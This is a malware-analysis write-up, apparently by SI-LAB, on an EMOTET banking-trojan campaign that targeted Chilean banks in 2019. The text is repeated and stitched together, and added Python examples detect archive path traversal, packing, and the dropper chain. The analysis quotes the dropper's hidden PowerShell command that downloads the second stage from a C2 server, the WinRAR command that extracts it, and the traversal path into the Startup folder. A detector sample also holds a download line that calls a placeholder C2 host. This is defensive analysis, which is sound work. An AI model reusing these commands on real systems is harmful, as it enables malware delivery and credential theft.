Interestingly, the first phase bypasses VirusTotal (VT) detections. With that, criminals achieved an important rule of thumb in the malware landscape: no detection. In fact, an old living-off-the-land technique was used, allowing the sample to become fully undetectable (FUD), which is the ultimate goal for malware authors.

Figure 7: No detections were identified by VT.

2nd stage — The dropper uses the WinRar/ACE vulnerability to distribute EMOTET


Threat name: 25RqcZpQ3.rar / denuncias.rar
MD5: 1e541b14b531bcac70e77a012b0f0f7f
SHA1: 0ca0cd36fb4c9dfeb3e325a01cfb7b75413d1f81
First submission: 2019-03-22 00:39:43


Looking inside the dropper, we can observe interesting artifacts.


Figure 8: Hex code from ‘denuncias.rar’ file — EMOTET dropper.

As shown, the string “C:../AppData\Roaming\Microsoft\Windows\Start.Menu\Programs\Startup\Integrity.exe” is found. In fact, this is CVE-2018-20250 announcing itself: “hello world, I’m here!”

In detail, if UAC is running, an attempt to extract the archive will fail to place the malware in the “C:\ProgramData” folder due to lack of permissions. This causes WinRAR to display an error stating “Access is denied” and “operation failed”.

On the other hand, if UAC is disabled or WinRAR runs with administrator privileges, it will install the malware to the following path:

  C:\Users\root\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Integrity.exe
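As an added example (not from the original analysis), this Python check shows why the archive entry above is dangerous and how an extractor should reject it: a member name with a drive-relative prefix (“C:../”) and “..” components resolves outside the extraction folder, which is the path-traversal pattern behind CVE-2018-20250. The member string and the Downloads folder are taken from the write-up; the safe member names are constructed, and `is_unsafe_archive_member`, `resolve_member_path` and `partition_members` are helper names chosen here.

```python
import ntpath

# Archive member name as reported in the dropper above: a drive-relative prefix
# ("C:../") followed by ".." components that climb out of the extraction folder.
MALICIOUS_MEMBER = r"C:../AppData\Roaming\Microsoft\Windows\Start.Menu\Programs\Startup\Integrity.exe"
# Extraction folder used by the first stage (from the write-up).
DOWNLOADS = r"C:\Users\root\Downloads"


def resolve_member_path(member_name: str, dest_dir: str) -> str:
    """Where a naive extractor would write the member: join and normalise, Windows-style.
    ntpath is used on purpose so the example reproduces Windows semantics on any OS."""
    return ntpath.normpath(ntpath.join(dest_dir, member_name.replace("/", "\\")))


def is_unsafe_archive_member(member_name: str, dest_dir: str = DOWNLOADS) -> bool:
    """True when the member name would escape dest_dir (the CVE-2018-20250 pattern)."""
    name = member_name.replace("/", "\\")
    drive, rest = ntpath.splitdrive(name)
    # Absolute, drive-relative ("C:..\\x") or UNC names are never acceptable in an archive.
    if drive or rest.startswith("\\"):
        return True
    # Any ".." component is a traversal attempt.
    if any(part == ".." for part in rest.split("\\")):
        return True
    # Belt and braces: the resolved path must stay inside dest_dir.
    base = ntpath.normcase(ntpath.normpath(dest_dir))
    target = ntpath.normcase(resolve_member_path(rest, dest_dir))
    return not (target == base or target.startswith(base + "\\"))


def partition_members(member_names, dest_dir: str = DOWNLOADS):
    """Split an archive listing into members safe to extract and members to reject."""
    safe, rejected = [], []
    for name in member_names:
        (rejected if is_unsafe_archive_member(name, dest_dir) else safe).append(name)
    return safe, rejected


if __name__ == "__main__":
    print("naive extractor would write to:", resolve_member_path(MALICIOUS_MEMBER, DOWNLOADS))
    print(partition_members([MALICIOUS_MEMBER, r"denuncias\readme.txt"]))
```

Running it shows the naive resolution landing in the user’s Startup folder rather than under Downloads, which is exactly the persistence the write-up describes; the check rejects the entry before anything is written.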

By extracting all the files we can obtain and analyse the malware itself.

Figure 9: EMOTET malware (‘Integrity.exe’) dropped by the 2nd stage.

More details on CVE-2018-20250 here.

EMOTET / Integrity.exe


Threat name: Integrity.exe
MD5: 98172becba685afdd109ac909e3a1085
SHA1: cbb0377ec81d8b120382950953d9069424fb100e
First submission: 2019-03-18 15:10:08


Digging into the last infection stage, we are facing the EMOTET banking trojan, a credential-stealing malware that has been infecting users from Chile in recent months.

At first glance, the malware is protected with the packer Themida 2.x. This is bad news for malware analysts.

Unpacking Themida, especially the newer versions, is not a small task by any means. Themida uses an extremely complex virtual machine environment combined with every anti-debug and anti-analysis trick in the book, together with many different obfuscation methods.

In a Themida binary, different parts of the code are run in virtual machines and it obscures the behavior of the target program. The best method to unpack a VM-protected packer like Themida is to devirtualize it, which involves figuring out the entire instruction set that the packer uses and writing a script to interpret that language. 

Figure 10 shows that the binary was developed in Delphi; nonetheless, we will not decompile it, because Themida is very hard to unpack and that task is extremely complex.

Figure 10: Packer and compiler detected — Themida 2.x and Delphi.

As we can see below (Figures 11 and 12), and reinforcing the presence of the packer, some sections have null names and others have high entropy (around 8.0). This is a clear signal that we are facing a challenge: the Themida packer!

Figure 10: EMOTET section entropy.

Figure 11 below illustrates, in its middle portion, that a large part of this file is really packed.

Figure 11: Emotet file entropy.

Another clear indicator that Themida is present is the PE import address table (IAT). The IAT is partially destroyed, and only one function from the kernel32.dll DLL can be observed: lstrcpy.

Figure 12: EMOTET IAT (result from Themida packer).
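As an added example (not from the original analysis), the following Python code computes the three packing heuristics the section-entropy, file-entropy and IAT observations above rely on: per-section Shannon entropy, nameless sections, and a near-empty import table. The sections and import table below are constructed stand-ins modelled on what the write-up reports (entropy around 8.0, null section names, a single lstrcpy import from kernel32.dll). `pe_packing_indicators` applies the same heuristics to a real file through the third-party pefile library, which is assumed to be installed only for that function.

```python
import math
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for a constant stream, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def packing_indicators(sections, imports, entropy_threshold: float = 7.0) -> dict:
    """sections: list of (raw_name_bytes, section_bytes); imports: {dll: [function names]}.
    Returns the heuristics used in the write-up: nameless sections, high-entropy
    sections, and a sparse import table. Compressed or encrypted code sits near
    8.0 bits/byte; ordinary x86 code is usually well below the threshold."""
    nameless = [i for i, (name, _) in enumerate(sections) if not name.strip(b"\x00").strip()]
    high = []
    for i, (name, data) in enumerate(sections):
        entropy = shannon_entropy(data)
        if entropy >= entropy_threshold:
            label = name.strip(b"\x00").decode("latin-1") or f"<section {i}>"
            high.append((label, round(entropy, 2)))
    import_count = sum(len(funcs) for funcs in imports.values())
    return {
        "nameless_sections": nameless,
        "high_entropy_sections": high,
        "import_count": import_count,
        "sparse_imports": import_count <= 2,
        "likely_packed": bool(high) and (bool(nameless) or import_count <= 2),
    }


def pe_packing_indicators(path: str) -> dict:
    """Same heuristics over a real PE file via pefile (third-party; assumed installed)."""
    import pefile  # imported lazily so the rest of the module runs without it
    pe = pefile.PE(path)
    sections = [(s.Name, s.get_data()) for s in pe.sections]
    imports = {}
    for entry in getattr(pe, "DIRECTORY_ENTRY_IMPORT", []):
        dll = entry.dll.decode("latin-1", "replace")
        imports[dll] = [imp.name.decode("latin-1", "replace") for imp in entry.imports if imp.name]
    return packing_indicators(sections, imports)


# Constructed stand-in for a Themida-protected sample: a small low-entropy code
# section, two nameless sections filled with uniformly distributed bytes, and an
# import table that only names lstrcpy (as reported for this sample).
SAMPLE_SECTIONS = [
    (b".text\x00\x00\x00", b"\x55\x8b\xec\x83\xec\x10" * 512),
    (b"\x00" * 8, bytes(range(256)) * 16),
    (b"\x00" * 8, bytes(range(255, -1, -1)) * 8),
]
SAMPLE_IMPORTS = {"kernel32.dll": ["lstrcpy"]}

if __name__ == "__main__":
    print(packing_indicators(SAMPLE_SECTIONS, SAMPLE_IMPORTS))
```

None of these signals proves packing on its own (installers and signed binaries legitimately carry compressed resources), but the combination of 8.0-entropy sections, blank section names and an import table reduced to one string function is the profile the analysis above describes.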

Dig into the details

The Themida packer is, in fact, a constant challenge for malware analysts. The approach we used to inspect the malware file was to dump it from memory while it is running. Bear in mind, though, that Themida devirtualizes only small pieces of code during execution, and that it also detects file and registry monitors (its anti-monitor techniques).

First, the virtual machine needs to be tuned to simulate the infection scenario as realistically as possible. For this, we need to change the system language preferences to Spain/Chile and adjust some values in the Windows Registry, since the malware reads them to detect analysis environments.

Figure 13: Changes performed to the SystemBiosDate and VideoBiosVersion values under HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System.

But nothing is perfect. The malware continuously checks which processes (window classes and titles) are present on the system and terminates if any of the following are found (this is an evasion technique used by the Themida packer, documented here). This is one of the many features of this modern packer.

  indicators = [
      "OLLYDBG",
      "GBDYLLO",
      "pediy06",
      "FilemonClass",
      "File Monitor - Sysinternals: www.sysinternals.com",
      "PROCMON_WINDOW_CLASS",
      "Process Monitor - Sysinternals: www.sysinternals.com",
      "RegmonClass",
      "Registry Monitor - Sysinternals: www.sysinternals.com",
      "18467-41",
  ]

Getting back to EMOTET: after dumping it from memory, we observed some things such as the DLLs it imports and the malware strings.

Only a few blocks of EMOTET can be analysed, since Themida runs inside a virtual machine environment: malware functions are devirtualized in real time, so the IAT cannot be properly rebuilt either.

Figure 14: DLLs imported by EMOTET and anti-VM and anti-dbg techniques detected in this specific memory dump.

After dumping it from memory, we observe that only some DLL imports are rebuilt; we suspect the others remain hidden. Both anti-VM and anti-debug techniques were again detected in the dump. This is nothing new!

However, some information can be extracted from the binary. When it executes on a victim’s computer, initial information is sent to the C2 server (a kind of “EHLO” message with some arguments).

Figure 15: EMOTET C2 server URL.

Information sent includes:

  • Date/hour of infection
  • Victim IP Address
  • Windows OS version
  • Antivirus name

Figure 16 presents a query performed by the malware to identify the antivirus product running on the infected machine. Winmgmts is the WMI service, hosted in an SVCHOST process running under the “LocalSystem” account.

Figure 16: EMOTET collects antivirus product name via WMI query.

The file “up.php” writes all the entries to another file called “tictic.txt”. Every time a victim is infected, an EHLO request is sent to “up.php”, which writes the infection data highlighted above into this file.

Figure 17: EMOTET C2 files available in an opendir.

Through this file, available in the C2 opendir, it was possible to build the GeoMap of Threats presented at the beginning of the article.

After processing the data we found that 1089 users were infected during this campaign. As pointed out, Chile, USA, Germany and France were the countries with the most hits. From a total of 1089, 175 victims were impacted in Chile, 162 in the USA, 137 in Germany and 132 in France.

But it is important to answer this question: what kind of data is collected by this banking trojan? Banking credentials, of course.

EMOTET drops a sqlite3.dll DLL during its execution in order to read data from the SQLite databases of the popular web browsers installed on the machine.

Figure 18: EMOTET collects data from main popular web-browsers.

During static analysis it was also possible to observe the targeted banks and financial institutions involved in this attack, namely:

  • BBVAnet
  • Santander
  • CorpBanca
  • Banco Falabella
  • BCI
  • Banco Security
  • Banco Estado
  • Banco de Chile

Figure 19: Banks and financial institutions involved in this attack.

Figure 20 (below) shows one of the last administration panels used by EMOTET in its recent infections.


Figure 20: Administration panel used in recent variants by EMOTET.

Another interesting aspect is the following string observed in past EMOTET infections and hardcoded inside many malware samples.

  C:\Projects\Pe indetectavel D2007\comps\TMSv7\AdvEdDD.pas

This is a drag-and-drop interface support file for Delphi 5, 6, 7, 2005, 2006 and C++Builder. We could not retrieve any more information about this library in the malware.

During this analysis we detected that the malware makes several connections to “www.bing.com”, probably to validate that it has a working Internet connection.

Figure 21: Internet connection is validated during EMOTET execution.

Curiously, across several memory dumps we noticed some interesting strings changing in memory. At one specific moment we obtained the following:

  75EE6DE16BB9D5BE439A3EF523A83AFA
  BICE
  C852CE43C4D6371C2DA82AD878D20420
  64FF1C0E1F0D0962E878D57DAAF36980E903B51530D0
  B2ADBB5BD210030E1B6C82E6524BA740EE6D9E
  2E29C77CA62FA75D8ADC7FB690C8D87B9732E37C97B84983D8CF5F9449ED
  BBVA
  50C560964C889B83EF71E713C11243F21DBE6FBE4A85A922
  212DC56494CF022FDC79D7B3B214B971D8123297FD003291CF
  D97482A059F06188A526A28681C20823
  C650E40229AAF90830A3AD
  ITA
  CC57EF022BAC2F04297BF728CFF324C360E71EBC6183A5
  8C94A257F056F65CF1205A8AAD918191B71DCA013EDE01
  64F00236E66EFC240866E60A359A
  A1A85B9C5CF95BF72775C2A6AE29A75C8297AF20C4788ACC075B83
  SANTA
  5DF40FD0084580AA52405E3A3AA221D30A1F37A95287BB1EB42DD1BC43F3053D94
  59F50E2BDC72D5BEA7F50B28D00D4C3BC71CCF759C4AFD57FF171431D91EDB
  64FF34F315499D
  B8509C5B8C9E2B00094487BD65E173B198F054A743F007425490BF6394AD44E47CA48587AE4DEE03
  AAB671B06FE66981B8EA2B0F17419F548A9FB728DC1022A43F9348252BCB6D95CC
  ACB74CEB034053DD01418280A72FA253
  CORP
  D945F333DA788E49F161F622046DE2023C9E489846
  ESTADO
  5FF80F2CC30175A35487D80C6A83D81CC60334A45233FC294485A049F139
  8E89BF7FAE2C42FE3F92C571D71146EF2AAC5E8E4829F6235383BF6E8CF4023C6AFCAB55FB08
  BCA75C9BB21066924B9E30DBBD32AB5883C768E41FD065EC78DC
  3FD86F8CA3215583BB2FA05432BB11D5025201538CED60F95CF911C96883
  61FA0926C5077FB962F16590F61D0D053B9E5488B15296
  948FA545E466B551FA295F83AA2EA3
  CHILE
  2A23DD01389537D30B19A68282DA798BB3E60E42282AC11FBD14
  50F926C264D2C1599E3E90F464BD30C67CEA1F0E38DCAFC619B56C9C
  8C85A145F565E248C11DBE759C29BA79
  BE87512029A426D375DA0FC6A02474E10A4DF5543EE31A0E67F82CD578
  2F28DC1A31928188A723
  BCI
  9883B34C36AB2B0061B3CB7DAB27BC6781C1
  64FF36CEA2C015CC0C4984A1534AF640CB18C316CFAEA333AA
  FB679F58344B8BB06FE6698E4789C86BC20A6F80AB5BED69BF35D60D
  B1AA5996B517041CCD034BF925A02A
  SECU
  44DF14D37BD8CB59F65181A74B8ECA7BEE3AD90A32D465B121B8964E7FB543E83FEE4EF826D91EC7789AB12B5E83EE13B563F831CC
  FALA
  F36F85A24A8B9895BA1545E30F429E57
  F41C28DE021050FE2AAD13C6A0CE0431C81FDD
  WebPay
  2727D96DF161E9
  E9649C5E983093BF6BAB3CEF1B0277B49D3EE66085B685C1074E8CA04E36C264B2698BBD6C8AFD34EF53F36D9A4FFD5383A9FD1725D7134124
  ServiPag
  F8152FF02BA624CE7A9ACE7AA1
  2932CE659F24BA6287D97AA98F3565F01BBC65E54CDE11B41FBF6F9CBE75B8
  SCOTI
  A8B67C8CB629BD7AD62EA85D89D77B8BB7

These seem to be encrypted strings carrying specific information about banking systems (maybe endpoints; we don’t know).

One way to fully understand the malware would be to devirtualize its entire code. As shown, the Themida packer makes malware analysis harder, and that was a big challenge during this investigation.

Further details, including Indicators of Compromise (IoCs), are reported in the analysis published by Pedro Tavares.

About the author Pedro Tavares 

Pedro Tavares is a professional in the field of information security working as an Ethical Hacker, Malware Analyst and also a Security Evangelist. He is also a founding member and Pentester at CSIRT.UBI and founder of the computer security blog segurancainformatica.pt.

Pierluigi Paganini

(SecurityAffairs – EMOTET malware, hacking)

The post [SI-LAB] EMOTET spread in Chile impacted hundreds of users and targeted financial and banking services appeared first on Security Affairs.

Security Affairs: [SI-LAB] EMOTET spread in Chile impacted hundreds of users and targeted financial and banking services

EMOTET spread in Chile targeted financial and banking services. SI-LAB detected hundreds of users that were impacted by this malware between March 18th and 26th of 2019.

The last days of March 2019 are making headlines due to a targeted cyber attack involving a new variant of infamous EMOTET malware. This threat is known as a banking trojan malware that collects financial information by injecting malicious code into a computer.

EMOTET has evolved in its delivery, however, this wave was conducted with the most prominent form: inserting malicious documents or URL links inside the body of an email sometimes disguised as an invoice or PDF attachment.

According to SI-LAB, a total of 176 users from Chile were affected in a broad cyber threat occurred between March 18th and 26th of 2019. Once again, the main goal of this campaign involving EMOTET had the propose of exfiltrating financial credentials from user’s computers to access financial and banking services geolocated in Chile.

The first phase identified as “__Denuncia_Activa_CL.PDF.bat” is responsible for operating a crucial part of this threat. That file was delivered via malscam campaigns around the world and its source-code is obfuscated in order to evade antivirus detection and complicate its analysis.

Interestingly, the first phase bypasses Virus Total (VT) detentions. With that, criminals achieved an important rule of thumb in the malware landscape: no detection. In fact, an old living of the land technique was used allowing to get fully undetectable (FUD) which is the ultimate goal for malware authors.

The .bat file is a Windows batch script that is responsible for downloading a second script from the Command & Control (C&C) server. The latter leverages the WinRar/Ace vulnerability (CVE-2018-20250) dropping the malware itself into the Windows startup folder. Next, the infected machine will reboot and malware becomes persistent in the system startup.

The high-level workflow this campaign is illustrated below.

emotet-diagram

EMOTET was protected with an extreme commercial packer dubbed Themida. Themida introduced an additional protection layer that made it harder to analyze. Other restrictions were also coded to prevent its execution in different types of scenarios. In this case, for instance, malware authors introduced several anti-run specifications related to victims’ geolocation and language preferences — only Spain/Chile computers were compromised.

Themida packer has a large group of specific features that are very appreciated by criminals to protect their threats. For example, it uses VM-protection techniques, debug-protection, virtual machine emulation, anti-monitors techniques, anti-memory patching (see all Themida features here).

The first alert related to this wave was observed on March 22nd by The Computer Security Certified Response Team (CSIRT), of the Ministry of the Interior from Chile.

“Preliminary information collected allows us to determine that the following URLs and the following IP addresses must be blocked, unless otherwise indicated,” the CSIRT Ministry of the Interior states.

“Based on information obtained from internal sources, the cybersecurity alert situation was identified by an incident related to malicious software called EMOTET affected by the relevant sectors of the economy” – CSIRT Chile.

CSIRT released a comprehensive list of IP addresses that EMOTET signals had to block. A national alert was sent (below) and can be consulted in this URL.

communication

SI-LAB detected that this attack started some days before the alerts were published. Thesecond malware phase (denuncias.rar); which used WinRar/Ace vulnerability (CVE-2018-20250) to drop the malware itself was uploaded by criminals to the opendir C2 server on March 18th, 2019. We can note below, in Technical  Analysis, that the malware was uploaded again later into another web folder on March 21st — maybe an update/change performed by its operators to improve their functionalities or to fix some bug.

emotet-3

As aforementioned, EMOTET only executes inside victim’s computers with Spain/Chile configured as their primary language and this can be an indicator that points to a global target attack.

After several rounds to understand the malware, we found that some Chile financial and banking organizations were targeted, including:

  • BBVAnet
  • Santander
  • CorpBanca
  • Banco Falabella
  • BCI
  • Banco Security
  • Banco Estado
  • Banco de Chile
emotet-4

When the malware is executed without any restrictions, i.e., upon a non-virtualized environment, some information from the victim’s computer is send to C2 server. Data includes date/hour of infectionremote IP from victim’s computer, OS version andantivirus name.

emotet-5

This information was available online on the opendir C2 server and SI-LAB analysed data in order to understand the total of infections and victims impacted this malicious targeted attack.

In detail, we found that 1089 users were impacted by this malware between March 18th and 26th, 2019.

We built a GeoMap of Threats that aggregates the victims’ IP addresses, based on their geolocation, that were collected from all the data in the opendir C2 server. Color intensity is correlated with the number of infections, being the darkest red equivalent to 175 infections in Chile.

GeoMap of Threats

EMOTET Victims of Cyber Threat in Chile

As indicated on the GeoMap of Threats, Chile, USA, Germany and France were the countries with most hits observed by SI-LAB. From a total of 1089 infections, 175 victims were impacted in Chile, 162 in USA, 137 in Germany and 132 in France.

Governmental agency CSIRT and Cybersecurity National System from Chile are currently fighting this growing threat and have been working on increasing awareness among users in the country. They encourage users to stay tuned for their computer security alerts.

For more details and complete analysis of this malicious campaign see the Technical Analysis below.

Technical Analysis


Threat name: __Denuncia_Activa_CL.PDF.bat
MD5: 1e541b14b531bcac70e77a012b0f0f7f
SHA1: 0ca0cd36fb4c9dfeb3e325a01cfb7b75413d1f81
First submission: 2019-03-22 00:39:43


The last weeks of March 2019 were marked for the wrong reasons: a global cyber threat targeted financial institutions and banks in Chile via the EMOTET banking trojan.

This campaign was conducted via an initial malspam wave that placed malicious documents or URL links inside the body of an email, sometimes disguised as an invoice or PDF attachment.

According to SI-LAB, 1089 users were impacted by this wave, 176 in Chile alone. This malware is not new and, once again, the main goal was the exfiltration of users' credentials for financial and banking services located in Chile.

The first malware phase, identified as "__Denuncia_Activa_CL.PDF.bat", is the conductor of the whole operation, which was carefully planned by the criminals. This file was delivered via malspam campaigns around the world, and its code is obfuscated in order to evade antivirus detection and hinder analysis. Figure 1 (below) shows the batch script encoded in little-endian UTF-16.


Figure 1: EMOTET malware obfuscated (encoded in Little-endian UTF-16) — the first phase.

After several decoding rounds it was possible to recover the malware source code in ASCII, shown below.

Figure 2: EMOTET malware deobfuscated — the first phase.

In general, the malicious batch script performs the following actions:

1. Generates random name to rename the 2nd stage (dropper)

First, the malware generates a random name for the 2nd file downloaded from the C2 server (the stage that exploits the WinRAR/ACE vulnerability, CVE-2018-20250). The latter drops EMOTET itself into the Windows startup folder (discussed later).

In detail, on lines 33, 34 and 35 we can observe that the second stage is downloaded to the victim's Downloads folder. The next image presents the output generated by the batch file.


Figure 3: Malware source-code output – the first phase.

2. Drops 2nd stage: a PowerShell command is executed to download the WinRAR exploit file 'denuncias.rar'.

  PowerShell -windowstyle hidden -Command "(New-Object Net.WebClient).DownloadFile('%downloadurl%'

The 2nd stage is downloaded from the C2 server, renamed ("25RqcZpQ3.rar") and placed in the "C:\Users\root\Downloads" folder.


Figure 4: Download path – the first phase.

As shown, this file is downloaded from an opendir C2 server. Note that the C2 server hosts this file in two different directories, namely:

  1. http://www.triosalud[.]cl/wp/wp-content/uploads/2019/02/denuncias.rar
  2. http://www.triosalud[.]cl/wp/wp-content/uploads/2019/03/denuncias.rar (URL hardcoded in the 1st stage of the malware)

Figure 5: 2nd stage available to download in two different directories.

3. Extracts EMOTET via WinRAR: after the 2nd stage ('denuncias.rar') is downloaded, the archive is extracted by WinRAR and the malware itself ('Integrity.exe', EMOTET) is dropped into the Windows startup folder through the WinRAR/ACE vulnerability; see lines 38 to 42 in Figure 2.

  "%ProgramFiles%\WinRAR\winRar.exe" x -y -c "%downloadpath%\%arch%" "%downloadpath%"

4. Pings for delay simulation

  ping 127.0.0.1 -n 1 > nul

5. Reboot for malware persistence

Once shutdown -r is executed, Windows reboots. This step establishes persistence, because the EMOTET binary extracted from the 2nd stage sits in the Windows startup folder. A normal reboot by the user would have the same effect, but for some reason this campaign does not wait for the user to reboot.

Upon reboot, the malicious program “Integrity.exe” (EMOTET malware) gets into action and connects to the Command and Control (C&C) server.
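As an added illustration (not part of the SI-LAB analysis), the following Python detector walks constructed process-creation events, modelled on Sysmon Event ID 1 fields, and reports a parent process whose children cover the chain described in steps 2 to 5: hidden PowerShell DownloadFile, WinRAR extraction from the Downloads folder, the ping delay and the forced reboot. The event records, PIDs and the C2 URL are constructed placeholders.

```python
"""Detector for the EMOTET first-stage batch chain (added example, not SI-LAB code).

Events are modelled on Sysmon Event ID 1 (process creation) fields; the
records, PIDs and the C2 URL below are constructed for this example.
"""
import re
from collections import defaultdict
from dataclasses import dataclass

# One (stage name, pattern) per action of the batch script, in chain order.
STAGES = [
    ("hidden_powershell_download",
     re.compile(r"powershell.*-windowstyle\s+hidden.*downloadfile", re.I)),
    ("winrar_extract_from_downloads",
     re.compile(r'winrar\.exe"?\s+x\s+-y\b.*\\downloads\\', re.I)),
    ("ping_delay",
     re.compile(r"\bping\s+127\.0\.0\.1\s+-n\s+1\b", re.I)),
    ("forced_reboot",
     re.compile(r"\bshutdown(\.exe)?\s+-r\b", re.I)),
]


@dataclass
class ProcEvent:
    pid: int
    parent_pid: int
    image: str
    command_line: str


def match_stage(command_line):
    """Return the chain stage whose pattern matches the command line, or None."""
    for name, pattern in STAGES:
        if pattern.search(command_line):
            return name
    return None


def find_dropper_chains(events, min_stages=3):
    """Group matched stages by parent PID (the batch file's cmd.exe) and return
    {parent_pid: [stages in chain order]} for every parent whose children cover
    at least min_stages distinct stages. A lone WinRAR extraction or a lone
    reboot never qualifies; the combination does."""
    per_parent = defaultdict(set)
    for ev in events:
        stage = match_stage(ev.command_line)
        if stage:
            per_parent[ev.parent_pid].add(stage)
    order = [name for name, _ in STAGES]
    return {ppid: [s for s in order if s in found]
            for ppid, found in per_parent.items() if len(found) >= min_stages}


SAMPLE_EVENTS = [  # constructed; mirrors steps 2 to 5 of the batch script
    ProcEvent(4120, 4100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'''PowerShell -windowstyle hidden -Command "(New-Object Net.WebClient).DownloadFile('http://c2.example/denuncias.rar','C:\Users\root\Downloads\25RqcZpQ3.rar')"'''),
    ProcEvent(4133, 4100, r"C:\Program Files\WinRAR\WinRAR.exe",
              r'"C:\Program Files\WinRAR\winRar.exe" x -y -c "C:\Users\root\Downloads\25RqcZpQ3.rar" "C:\Users\root\Downloads"'),
    ProcEvent(4140, 4100, r"C:\Windows\System32\PING.EXE", "ping 127.0.0.1 -n 1"),
    ProcEvent(4151, 4100, r"C:\Windows\System32\shutdown.exe", "shutdown -r"),
    # Benign noise: a user extracting an archive from the Desktop by hand.
    ProcEvent(5200, 5100, r"C:\Program Files\WinRAR\WinRAR.exe",
              r'"C:\Program Files\WinRAR\WinRAR.exe" x -y "C:\Users\alice\Desktop\photos.rar" "C:\Users\alice\Desktop"'),
]

if __name__ == "__main__":
    for ppid, stages in find_dropper_chains(SAMPLE_EVENTS).items():
        print(f"parent PID {ppid}: {len(stages)}/{len(STAGES)} stages -> {stages}")
```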

Figure 6: Infection graph generated and extracted from Virus Total.

Interestingly, the first phase bypasses Virus Total (VT) detection. With that, the criminals achieved an important rule of thumb in the malware landscape: no detection. In fact, an old living-off-the-land technique was used to obtain a fully undetectable (FUD) sample, which is the ultimate goal for malware authors.


Figure 7: No detections were identified by VT.

2nd stage — The dropper uses the WinRar/ACE vulnerability to distribute EMOTET


Threat name: 25RqcZpQ3.rar / denuncias.rar
MD5: 1e541b14b531bcac70e77a012b0f0f7f
SHA1: 0ca0cd36fb4c9dfeb3e325a01cfb7b75413d1f81
First submission: 2019-03-22 00:39:43


Looking inside the dropper, we can observe interesting artifacts.


Figure 8: Hex code from ‘denuncias.rar’ file — EMOTET dropper.

As shown, the string "C:../AppData\Roaming\Microsoft\Windows\Start.Menu\Programs\Startup\Integrity.exe" is found. In fact, this is CVE-2018-20250 just saying "hello world, I'm here!"

In detail, if UAC is running, an attempt to extract the archive will fail to place the malware in the "C:\ProgramData" folder due to lack of permissions. This causes WinRAR to display an error stating "Access is denied" and "operation failed".

On the other hand, if UAC is disabled or WinRAR is run with administrator privileges, it will install the malware to the following path:

  C:\Users\root\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Integrity.exe
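The following Python check, added here as an illustration and not taken from the SI-LAB analysis or from WinRAR, shows how an extraction tool or a mail gateway can refuse archive entry names of the kind recovered from the dropper above before anything is written to disk: drive prefixes are stripped repeatedly before checking (so a name built to survive a single stripping pass is still caught), '..' segments and absolute paths are rejected, and a resolved target must stay inside the extraction directory. The dest_dir value and the sample entries other than the dropper's are constructed.

```python
"""Pre-extraction check for archive entry names (added example, not SI-LAB code).

Rejects entry names of the kind found in the dropper, which combine a drive
prefix with a '..' segment so that extraction lands in a Startup folder.
dest_dir and the entries other than DROPPER_ENTRY are constructed here.
"""
import posixpath
import re

DRIVE_PREFIX = re.compile(r"^[A-Za-z]:")
# Accepts 'Start Menu' and the 'Start.Menu' rendering seen in the hex dump.
STARTUP_DIR = re.compile(r"(^|/)start[ .]menu/programs/startup/", re.I)

# The string recovered from 'denuncias.rar' in the analysis above.
DROPPER_ENTRY = (r"C:../AppData\Roaming\Microsoft\Windows"
                 r"\Start Menu\Programs\Startup\Integrity.exe")


def normalize_entry(name):
    """Canonical '/'-separated form of a stored entry name. Drive prefixes are
    stripped repeatedly so a name built to survive one stripping pass is
    still reduced to its real relative path."""
    path = name.replace("\\", "/")
    while DRIVE_PREFIX.match(path):
        path = path[2:]
    return path


def entry_problems(name):
    """Return the reasons an entry name is unsafe; an empty list means safe."""
    problems = []
    path = normalize_entry(name)
    if path != name.replace("\\", "/"):
        problems.append("drive prefix in entry name")
    if path.startswith("/"):
        problems.append("absolute path")
    parts = [p for p in path.split("/") if p not in ("", ".")]
    if ".." in parts:
        problems.append("parent-directory traversal")
    if STARTUP_DIR.search(path):
        problems.append("targets a Startup folder")
    return problems


def resolve_target(dest_dir, name):
    """Final extraction path for a safe entry, or None if it must be refused.
    Even a name that passes entry_problems is re-checked against dest_dir."""
    if entry_problems(name):
        return None
    dest = posixpath.normpath(dest_dir)
    target = posixpath.normpath(posixpath.join(dest, normalize_entry(name)))
    return target if target.startswith(dest + "/") else None


def audit_archive(entries):
    """Map each unsafe entry name to its problems (safe entries are omitted)."""
    return {name: entry_problems(name) for name in entries if entry_problems(name)}


SAMPLE_ENTRIES = [                       # constructed archive listing
    "denuncias/Denuncia_Activa.pdf",     # what the victim expects to find
    DROPPER_ENTRY,                       # the traversal entry
    r"..\..\Windows\Temp\helper.exe",    # plain traversal, no drive prefix
    "/etc/cron.d/job",                   # absolute path
]

if __name__ == "__main__":
    for name, why in audit_archive(SAMPLE_ENTRIES).items():
        print(f"REFUSE {name!r}: {', '.join(why)}")
    print(resolve_target("/home/analyst/extract", SAMPLE_ENTRIES[0]))
```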

By extracting all the files we can obtain and analyse the malware itself.


Figure 9: EMOTET malware (‘Integrity.exe”) dropped by 2nd stage.

More details on CVE-2018-20250 here.

EMOTET / Integrity.exe


Threat name: Integrity.exe
MD5: 98172becba685afdd109ac909e3a1085
SHA1: cbb0377ec81d8b120382950953d9069424fb100e
First submission: 2019-03-18 15:10:08


Digging into the last infection stage, we are facing the EMOTET banking trojan, a credential-stealing malware that has been infecting users in Chile in recent months.

At first glance, the malware is protected with the Themida 2.x packer. This is bad news for malware analysts.

Unpacking Themida, especially the newer versions, is not a small task by any means. Themida uses an extremely complex virtual machine environment combined with every anti-debug and anti-analysis trick in the book, together with many different obfuscation methods.

In a Themida binary, different parts of the code are run in virtual machines and it obscures the behavior of the target program. The best method to unpack a VM-protected packer like Themida is to devirtualize it, which involves figuring out the entire instruction set that the packer uses and writing a script to interpret that language. 

Figure 10 shows the binary was developed in Delphi; nonetheless, we will not decompile it because Themida is very hard to unpack and that task is extremely complex.


Figure 10: Packer and compiler detected — Themida 2.x and Delphi.

As we can see below (Figures 11 and 12), and reinforcing the presence of the packer, some sections have null names and others have high entropy (around 8.0). This is a clear signal that we are facing a challenge: the Themida packer!


Figure 10: EMOTET section entropy.

Figure 11 below illustrates, in the middle of the chart, that a large part of this file is really packed.


Figure 11: Emotet file entropy.

